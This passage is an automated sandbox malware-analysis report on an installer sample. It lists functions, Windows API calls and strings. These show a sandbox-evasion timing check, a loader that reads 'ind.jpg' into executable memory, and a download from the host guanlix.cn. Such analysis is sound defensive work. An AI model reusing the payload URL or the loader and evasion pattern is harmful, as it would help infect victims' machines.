Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f02dbe78edbd599c64e6a40e2b1253b5911ac3f8725852b074320d88d6f0ffa
Instruction ID: f0c6fdd599c16add2798ab3165dfe53d24cfaedcf1196c060dfc4795bf93ae2c
Opcode Fuzzy Hash: 7f02dbe78edbd599c64e6a40e2b1253b5911ac3f8725852b074320d88d6f0ffa
Instruction Fuzzy Hash: 14525639B00210DFDB08FB74D868B3E77A7BB88714F14856AD9469B394DF399C428B91

Function 05F8B3F8 Relevance: .9, Instructions: 913COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db2a0f4ff4c1ebe852f8eb162cbab323424707e0892518866350803aab3d7d8
Instruction ID: e18d8603a233f91bdaf5e7c81b45333c964e22a5c419173f997f21c40e24126b
Opcode Fuzzy Hash: 5db2a0f4ff4c1ebe852f8eb162cbab323424707e0892518866350803aab3d7d8
Instruction Fuzzy Hash: 66823A31A04209DFCB14EF68D984ABEBBF2FF48314F158599E456AB2A5D738EC41CB50

Function 05F8A6B8 Relevance: .9, Instructions: 896COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd630ddc4b80efeb4004be93c3fc8469975f2925786ab85d952562fcc2737547
Instruction ID: 2f628444e78d8d3d1cde2d7c4fb862e8fa8a6ace69cf444297311914d6652971
Opcode Fuzzy Hash: bd630ddc4b80efeb4004be93c3fc8469975f2925786ab85d952562fcc2737547
Instruction Fuzzy Hash: FC725D71A002199FDB14EF69C984BBEBBB6FF88314F14816AE455AB391DB38DC41CB50

Function 05F855D8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cd2c7306e3cf1b051ae5c80b451fbd24246812376ce04a42f1ef1987ea33dc0
Instruction ID: aa1256d66d1750a1f6f7779c9a5f8ed6df35841f80c965124d925f5e9d0f892a
Opcode Fuzzy Hash: 3cd2c7306e3cf1b051ae5c80b451fbd24246812376ce04a42f1ef1987ea33dc0
Instruction Fuzzy Hash: 3EB16F70E00609EFDF10DFA9C8857AEBBF2BF88754F148529D815AB254EB789845CF81

Function 00B711E1 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 89
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 00B711EF
Sleep.KERNEL32(0000012C), ref: 00B711F9
GetTickCount64.KERNEL32 ref: 00B711FF

Part of subcall function 00B74424: __vwprintf_l.LIBCMT ref: 00B74432

CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00B71244
GetFileSize.KERNEL32(00000000,00000000), ref: 00B7124E
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00B7125F
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00B71270
FindCloseChangeNotification.KERNEL32(00000000), ref: 00B71277

Strings

v4:%d, xrefs: 00B7120C
sandbox!!!, xrefs: 00B71222
`3Mw01Mw, xrefs: 00B7124E
C:\Users\Public\Downloads\ind.jpg, xrefs: 00B7123F

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: File$Count64Tick$AllocChangeCloseCreateFindNotificationReadSizeSleepVirtual__vwprintf_l
String ID: C:\Users\Public\Downloads\ind.jpg$`3Mw01Mw$sandbox!!!$v4:%d
API String ID: 2034448642-531378182
Opcode ID: da0238c70b080f3348614ebfc01efe7bbf04928e9eb874d1efff7b6158ab422c
Instruction ID: b7b366e9560f8ef4c11d7d6e7f26237cf601d154daf90060d7df5a4693eaeb10
Opcode Fuzzy Hash: da0238c70b080f3348614ebfc01efe7bbf04928e9eb874d1efff7b6158ab422c
Instruction Fuzzy Hash: FE11A2736442147FEA206BF96C59FBB7AACEB46771F240525FA09D31A0DAA05D00C2B1

Function 00B72E42 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00B72E42
InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00B72E5E
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00B72E7B
InternetCloseHandle.WININET(?), ref: 00B72F0F

Part of subcall function 00B72D13: __EH_prolog.LIBCMT ref: 00B72D18

InternetReadFile.WININET(?,?,00001000,?), ref: 00B72EE1
InternetCloseHandle.WININET(?), ref: 00B72EF7

Strings

Download, xrefs: 00B72E59

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: Internet$CloseH_prologHandleOpen$FileRead
String ID: Download
API String ID: 2208602198-2171396134
Opcode ID: f4614a816583d3f15e0a1ae90d9597595a25297e845ba8ac3bb484944f8b11b3
Instruction ID: 3ced716e03c32f750ac026226354d4c878e7d9292990f353141be1ce37576941
Opcode Fuzzy Hash: f4614a816583d3f15e0a1ae90d9597595a25297e845ba8ac3bb484944f8b11b3
Instruction Fuzzy Hash: E121EC7190011AEFEF20AB94CC89FFEBBB9FB04354F1441A9B519B61A1D7705E44DB60

Function 00B72E3D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00B72E42
InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00B72E5E
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00B72E7B
InternetCloseHandle.WININET(?), ref: 00B72F0F

Part of subcall function 00B72D13: __EH_prolog.LIBCMT ref: 00B72D18

InternetReadFile.WININET(?,?,00001000,?), ref: 00B72EE1
InternetCloseHandle.WININET(?), ref: 00B72EF7

Strings

Download, xrefs: 00B72E59

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: Internet$CloseH_prologHandleOpen$FileRead
String ID: Download
API String ID: 2208602198-2171396134
Opcode ID: b409a93613ad56e0e1fbdce94918ce92b531684f948a2283009bd7497ef730dc
Instruction ID: 3ff8cef24b728f87ba3ed7748c6d8c1c0fab03788a67b8d775b4c955c3f9bce5
Opcode Fuzzy Hash: b409a93613ad56e0e1fbdce94918ce92b531684f948a2283009bd7497ef730dc
Instruction Fuzzy Hash: 45112C71900119EFEF20AB94CC89FEEBAB9EB04354F1441A9B619B61A0C7705E40CB60

Function 03ABFFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000,00000002,?,03ABFCB5,00000000), ref: 03ABFFF5
VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,03ABFCB5,00000000), ref: 03AC0035
VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 03AC0068
VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 03AC0093
VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 03AC00BD

Memory Dump Source

Source File: 00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ab0000_103__Installer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction ID: ef26164d3eee0b554b1a87e23d664612d993989b83cb11713ffb2b94da345451
Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction Fuzzy Hash: A821C876215349AFD320DA64CC48E7BBBECEB84301B06083FBA47D2551EB74E5048661

Function 00B72964 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00B72964
_Fputc.LIBCPMT ref: 00B729C9
_Fputc.LIBCPMT ref: 00B72A9F

Strings

, xrefs: 00B72A76

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: Fputc$H_prolog
String ID:
API String ID: 1896196775-3916222277
Opcode ID: 2aeda205b46232bdffd482e0606d86d76d8b906a7ed6fdf26bf36797777554db
Instruction ID: 07456b1608c3aa302ee8fcd402767c0a1a6f9825560241a7483d62ff828e7b8a
Opcode Fuzzy Hash: 2aeda205b46232bdffd482e0606d86d76d8b906a7ed6fdf26bf36797777554db
Instruction Fuzzy Hash: 6E410731904205DFDF24CB98C980AEEB3F5FF54310F2485AAE56AA7281D770AD40CB60

Function 03AC00CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 03AC011B
VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 03AC014E
VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 03AC0179
VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 03AC01A3

Memory Dump Source

Source File: 00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ab0000_103__Installer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction ID: 66c7c864b9f5ab7a9096083d64125ae62d8e092b271989ca15847db6c68b0342
Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction Fuzzy Hash: B1216872314789AFE720DA65DD88E77B7ECEB88601B04083EBA87E1552EB74F5054A70

Function 00B72F22 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B71186: __time64.LIBCMT ref: 00B7118E
Part of subcall function 00B71186: _rand.LIBCMT ref: 00B7119E
Part of subcall function 00B71186: _rand.LIBCMT ref: 00B711AD

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 00B72F33

Part of subcall function 00B72E3D: __EH_prolog.LIBCMT ref: 00B72E42
Part of subcall function 00B72E3D: InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00B72E5E
Part of subcall function 00B72E3D: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00B72E7B
Part of subcall function 00B72E3D: InternetReadFile.WININET(?,?,00001000,?), ref: 00B72EE1
Part of subcall function 00B72E3D: InternetCloseHandle.WININET(?), ref: 00B72EF7
Part of subcall function 00B72E3D: InternetCloseHandle.WININET(?), ref: 00B72F0F

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B72F54

Part of subcall function 00B7168B: _wprintf.LIBCMT ref: 00B7169D
Part of subcall function 00B7168B: _wprintf.LIBCMT ref: 00B716B5
Part of subcall function 00B7168B: _wprintf.LIBCMT ref: 00B716CA

Part of subcall function 00B711E1: GetTickCount64.KERNEL32 ref: 00B711EF
Part of subcall function 00B711E1: Sleep.KERNEL32(0000012C), ref: 00B711F9
Part of subcall function 00B711E1: GetTickCount64.KERNEL32 ref: 00B711FF
Part of subcall function 00B711E1: CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00B71244
Part of subcall function 00B711E1: GetFileSize.KERNEL32(00000000,00000000), ref: 00B7124E
Part of subcall function 00B711E1: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00B7125F
Part of subcall function 00B711E1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00B71270
Part of subcall function 00B711E1: FindCloseChangeNotification.KERNEL32(00000000), ref: 00B71277

Strings

http://guanlix.cn:881/103.ccp, xrefs: 00B72F3E
C:\Users\Public\Downloads\ind.jpg, xrefs: 00B72F39

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: Internet$File$CloseVirtual_wprintf$AllocCount64HandleOpenReadTick_rand$ChangeCreateFindFreeH_prologNotificationSizeSleep__time64
String ID: C:\Users\Public\Downloads\ind.jpg$http://guanlix.cn:881/103.ccp
API String ID: 1532265807-3614036361
Opcode ID: 66bd0e7844145aa3086fd48b9e9575e3e6772bd0329b287babd9ba649f37a164
Instruction ID: 0bd1d2a743782acc2a9e6a0dbf222035409cca6157cb74546a8d86deeab3658c
Opcode Fuzzy Hash: 66bd0e7844145aa3086fd48b9e9575e3e6772bd0329b287babd9ba649f37a164
Instruction Fuzzy Hash: FFE012712482507AFA5073B86C0FFAE15D49B00B51F158891F615B90E1DD945941D77D

Function 03ABFB37 Relevance: 3.2, APIs: 2, Instructions: 216
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 03ABFB8F
LoadLibraryA.KERNEL32(00000238), ref: 03ABFC2C

Memory Dump Source

Source File: 00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ab0000_103__Installer.jbxd

Yara matches

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction ID: 8d09d847fc4ff0cde9c3597f4cf3dcdc6e44d1e810b01fccb37167ee306e35c9
Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction Fuzzy Hash: F361AC76501B02AFCB22EB608D84AABF3BDFF05214F1C0A1FEA5A49541E735F151CB51

Function 00B75902 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B7A8EB: __getptd_noexit.LIBCMT ref: 00B7A8EB

__lock_file.LIBCMT ref: 00B75949

Part of subcall function 00B750E4: __lock.LIBCMT ref: 00B75109

__fclose_nolock.LIBCMT ref: 00B75954

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: ad32bdcd4bd7063ae0ca762730e31d11f8ce48775021c5fea5ec2533cedd051b
Instruction ID: a04f5f1987b27492a650ebfc34244888e52cfb9f80bacf6c7454f05bd24a6bba
Opcode Fuzzy Hash: ad32bdcd4bd7063ae0ca762730e31d11f8ce48775021c5fea5ec2533cedd051b
Instruction Fuzzy Hash: 1EF09630800B05DADB70BB74884275E7BE0AF41330F25C3C8E53DAA0D1C7BC59029B56

Function 05F875E0 Relevance: 1.6, APIs: 1, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f952fca476bc4c4c967088c490d3ecdb2cc3577e1e491521f326789dee48a18
Instruction ID: a257fa06cd2ce03ddcef952d780df9b7b7e5e8328561353aa5222b4622ccb15f
Opcode Fuzzy Hash: 8f952fca476bc4c4c967088c490d3ecdb2cc3577e1e491521f326789dee48a18
Instruction Fuzzy Hash: 20410572E043598FDB14EF79D8047AEBBF5EF89210F14866AD849E7240DB789841CBD0

Function 00B71830 Relevance: 1.6, APIs: 1, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memmove.LIBCMT ref: 00B7188D

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: b31e1f9b03b365c2f3d260a60de42dfc28d177028125769d53eafa99e593f33c
Instruction ID: 20f8161a904186111208c55a83ef44eff8511e377c935d6701735a830830900b
Opcode Fuzzy Hash: b31e1f9b03b365c2f3d260a60de42dfc28d177028125769d53eafa99e593f33c
Instruction Fuzzy Hash: BA314935910249EFCB50CF5DC88459977F4FF09324F14CAAAE82896151E3709A50DFA2

Function 05F86FD1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05F87632), ref: 05F8771F

Memory Dump Source

Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: ec5d1bcd7164a6242b4dcd93738495c75ab5c403a332b48cda9ac3ab031ba053
Instruction ID: 29ba5cba6e04f0e76c5c98c7c8bc9c4753050895134bf16628bc6aef0ca703eb
Opcode Fuzzy Hash: ec5d1bcd7164a6242b4dcd93738495c75ab5c403a332b48cda9ac3ab031ba053
Instruction Fuzzy Hash: 562168B1C0465A9FDB10DFAAC444BAEFBB4FF08310F24816AD858A7200D378A940CFA1

Function 00B72D13 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B72D18

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 516d242881023e8ad0ac6e690d1cd5122729604b5c509c36d0b4f7e430ed8d9b
Instruction ID: d5eccca8e7d318b83510ca4c70ee252ac0a00a26f7749df7429088bc6b6cf3af
Opcode Fuzzy Hash: 516d242881023e8ad0ac6e690d1cd5122729604b5c509c36d0b4f7e430ed8d9b
Instruction Fuzzy Hash: BB112BB1610204AFDB24DF99C885AAEF7F9EB54748F0488AEF45AA7251C7B19D01CB60

Function 00B72D18 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B72D18

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4b5ab792db989f7ff8b7e9b1a7721ea6eef0c46abe6bbd9c04ac20084e3eda0a
Instruction ID: 0cda78ce70e848f5800a05f79d8af2a6f10463319c72f71965ecd75af83ea299
Opcode Fuzzy Hash: 4b5ab792db989f7ff8b7e9b1a7721ea6eef0c46abe6bbd9c04ac20084e3eda0a
Instruction Fuzzy Hash: 2C113DB1610204AFDB24DF99C885AAEF7F9FB54748F0488AEF45AA7251C3B19D01CB60

Function 05F876B0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05F87632), ref: 05F8771F

Memory Dump Source

Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 1ee7dfbc182b633779b6ab7528f4a6795f1c63233b75d78de51c219b790e224e
Instruction ID: f5841ab0955e7cca4e1bb8a6dd555ba12bb26c945d4acf93e17a227eb47867c4
Opcode Fuzzy Hash: 1ee7dfbc182b633779b6ab7528f4a6795f1c63233b75d78de51c219b790e224e
Instruction Fuzzy Hash: B51144B2C006599BDB10DFAAC445BEEFBB4FF48220F14812AD818A7200D378A940CFA5

Function 05F86F64 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05F87632), ref: 05F8771F

Memory Dump Source

Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: f062cceb0ad03ad198682f79d06ff068cbd6c6e4269fb65a513458bdab0bbf45
Instruction ID: f53ac8a21e6997d665dcad285d7f269a4b9c16ee9a4f0c75af0b833b11c6d842
Opcode Fuzzy Hash: f062cceb0ad03ad198682f79d06ff068cbd6c6e4269fb65a513458bdab0bbf45
Instruction Fuzzy Hash: 531106B2C046599BDB10DF9AD5447EEFBB4FF48210F14816AE818A7240D379A944CFA5

Function 00B7246D Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B7246D

Part of subcall function 00B7130B: std::locale::facet::_Incref.LIBCPMT ref: 00B7131E

Part of subcall function 00B72344: __EH_prolog.LIBCMT ref: 00B72349
Part of subcall function 00B72344: std::_Lockit::_Lockit.LIBCPMT ref: 00B72358
Part of subcall function 00B72344: int.LIBCPMT ref: 00B7236F

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
String ID:
API String ID: 3551698239-0
Opcode ID: 2d5285a6f7b0454f63ad014ddca2fc5967f2237b946529e9e2b63b75815453c0
Instruction ID: f650bde362fd1508f61620c596117abfa24e5a0e7ac3da8efff5af13c64c2397
Opcode Fuzzy Hash: 2d5285a6f7b0454f63ad014ddca2fc5967f2237b946529e9e2b63b75815453c0
Instruction Fuzzy Hash: F9F06D72600154AFCB16EB6CCC01BAE73EAAF18701F00C8A9F52DD22C1DBB48A548764

Function 00B72468 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B7246D

Part of subcall function 00B7130B: std::locale::facet::_Incref.LIBCPMT ref: 00B7131E

Part of subcall function 00B72344: __EH_prolog.LIBCMT ref: 00B72349
Part of subcall function 00B72344: std::_Lockit::_Lockit.LIBCPMT ref: 00B72358
Part of subcall function 00B72344: int.LIBCPMT ref: 00B7236F

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
